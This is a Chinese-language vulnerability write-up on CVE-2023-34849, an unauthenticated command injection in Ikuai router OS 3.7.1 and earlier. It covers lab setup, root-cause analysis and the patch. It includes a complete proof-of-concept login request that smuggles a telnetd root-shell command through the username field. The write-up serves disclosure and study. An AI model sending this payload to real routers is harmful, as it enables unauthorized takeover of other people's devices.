CVE-2023-34849 Ikuai 软路由未授权RCE

John Doe

2023-10-19

漏洞描述

1
2
3

漏洞类型：未授权RCE
影响范围：供应商已修补版本 3.7.2 中的漏洞
漏洞接口：webman.lua、ikngx.lua

影响范围

Ikuai 路由器 OS 3.7.1 及之前版本

环境搭建

新建虚拟机，光盘选择Ikuai的iso镜像

操作系统选择Linux，版本选择Ubuntu即可

设置虚拟机名字和安装位置

设置处理器

设置内存

网络类型桥接

选择I/O控制器

选择磁盘类型

创建新磁盘

设置磁盘大小

下一步

完成

编辑虚拟机设置->添加->网络适配器（网卡2设置仅主机模式）

启动虚拟机，安装硬盘

1	Ikuai`默认地址是`192.168.1.1

设置网卡绑定

1 2	del lan1 set lan1 eth0

设置LAN/WAN地址

配置成功，访问web端，默认账号密码：admin/admin

获取shell

1	web`端开启`telnet`连接后发现是`CLI

利用漏洞进入root shell查看telnet进程信息如下：

1	9936 root 1336 S {exe} telnetd -l /etc/setup/rc.console

然后查看/etc/setup/rc.console文件

...
case ${opmode} in
q|Q) touch /tmp/console.lock ;;
0) /etc/setup/setup.show ;;
1) /etc/setup/setup.setif ;;
2) /etc/setup/setup.lanip ;;
3) . /etc/setup/setup.webport ;;
4) /etc/setup/setup.ping ;;
5) /etc/setup/setup.flush ;;
6) /etc/setup/setup.default ;;
7) /etc/setup/setup.webpwd ;;
8) /etc/setup/setup.shutdown ;;
9) /etc/setup/setup.ethernet ;;
o|O) /etc/setup/setup.other ;;
v|V) /etc/setup/setup.one_stick_router ;;
...

可以看到输入指令调用对应的程序，那么挂载虚拟机，将内存文件中的/etc/setup/setup.ping替换为///////////////bin/sh，启动后输入4即可获取shell

漏洞分析

webman.lua程序中登录时，对username字段未过滤，传递给ikngx.lua的logger函数造成命令执行

命令执行

POC

POST /Action/login HTTP/1.1
Host: 192.168.224.110
Content-Length: 138
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.88 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://192.168.224.110
Referer: http://192.168.224.110/login
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"username":"\";telnetd -p 2323 -l /bin/sh;\"","passwd":"0cc175b9c0f1b6a831c399e269772661","pass":"c2FsdF8xMWE=","remember_password":null}

补丁分析

登录前，先对username字段进行过滤处理

参考链接

环境搭建：

https://blog.csdn.net/weixin_43343299/article/details/113701449

https://github.com/cczzmm/IOT-POC/tree/main/Ikuai